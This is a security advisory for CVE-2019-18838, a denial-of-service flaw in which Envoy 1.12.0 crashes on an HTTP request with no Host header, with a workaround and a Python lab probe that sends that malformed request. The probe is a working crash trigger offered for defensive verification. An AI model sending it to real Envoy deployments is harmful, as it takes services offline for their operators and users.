PT-2019-15692 · Envoy · Envoy

Oleg Guba · Published 2019-12-13 · Updated 2019-12-18 · CVE-2019-18838

CVSS v3.1: 7.5 (High)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Name of the Vulnerable Software and Affected Versions

Envoy version 1.12.0

Description

Upon receipt of a malformed HTTP request that lacks a Host header, Envoy generates an "Invalid request" response internally. That local response is dispatched through the configured encoder filter chain before it is sent to the client. Because the stream has no request Host to read, any encoder filter that invokes route manager APIs which access the request's Host header dereferences a NULL pointer, and the Envoy process terminates abnormally. The triggering request needs no authentication or user interaction, so a single unauthenticated client can take down any listener whose filter chain contains such a filter; the impact is availability only (C:N/I:N/A:H).

Recommendations

For Envoy version 1.12.0, remove from the HTTP connection manager's filter chain any encoder filter that invokes route manager APIs until the patched release is deployed. This prevents the NULL pointer dereference and the abnormal termination of the Envoy process, at the cost of that filter's functionality. After applying the workaround or the fix, confirm on a lab instance that a request without a Host header no longer terminates the process.
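The trigger condition above, an HTTP/1.1 request with no Host header, cannot be reproduced with ordinary clients, because curl, requests and urllib insert a Host header automatically. The following probe is an added example and not code from this advisory or from the Envoy project: it writes the raw request bytes to a socket by hand, then sends a well-formed request to check that the listener still answers. The listener address and port and the hostname `lab.example` are assumptions for a lab setup. Run it only against a test instance, since on an affected build with such an encoder filter configured it is expected to terminate the Envoy process.

```python
"""Lab probe for the CVE-2019-18838 crash condition.

Added example (not from the advisory or the Envoy project). Ordinary HTTP
clients always add a Host header, so the malformed request has to be written
to the socket as raw bytes. Address, port and hostname are lab assumptions.
"""
import socket

LAB_HOST = "127.0.0.1"   # assumption: Envoy listener in a lab environment
LAB_PORT = 10000         # assumption: listener port used by that lab config


def build_request(path="/", host=None, extra_headers=None):
    """Build a raw HTTP/1.1 GET. With host=None no Host header is emitted,
    which is the malformed shape the advisory describes."""
    lines = [f"GET {path} HTTP/1.1"]
    if host is not None:
        lines.append(f"Host: {host}")
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    lines.append("Connection: close")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def has_host_header(raw_request):
    """True if the request head carries a Host header (names are case-insensitive)."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, _ = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            return True
    return False


def send_raw(raw_request, host=LAB_HOST, port=LAB_PORT, timeout=5.0):
    """Write raw bytes to the listener and return (status_line, response_bytes),
    or None if the connection is refused, reset or times out before any reply."""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(raw_request)
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
    except OSError:
        # A reset here is itself a signal: on an affected build the worker
        # may die while generating the local reply.
        if not chunks:
            return None
    response = b"".join(chunks)
    if not response:
        return None
    status_line = response.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    return status_line, response


def probe(host=LAB_HOST, port=LAB_PORT):
    """Send the hostless request, then a well-formed one.

    Returns a dict with both outcomes. A None for "followup" means the listener
    no longer answers, i.e. the process was most likely terminated."""
    return {
        "hostless": send_raw(build_request("/", host=None), host, port),
        "followup": send_raw(build_request("/", host="lab.example"), host, port),
    }


if __name__ == "__main__":
    for name, outcome in probe().items():
        print(name, "->", "no response" if outcome is None else outcome[0])
```

On a patched build, or one where the offending encoder filter has been removed, both requests get an answer (the first one Envoy's locally generated error response, the second a normal routed response). On an affected build the second request typically fails to connect, which is the observable the recommendation above asks you to confirm before and after the change.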

Exploit

Fix

DoS

NULL Pointer Dereference


Weakness Enumeration

Related identifiers

CVE-2019-18838
GHSA-F2RV-4W6X-RWHC
RHSA-2019:4222

Affected products

Envoy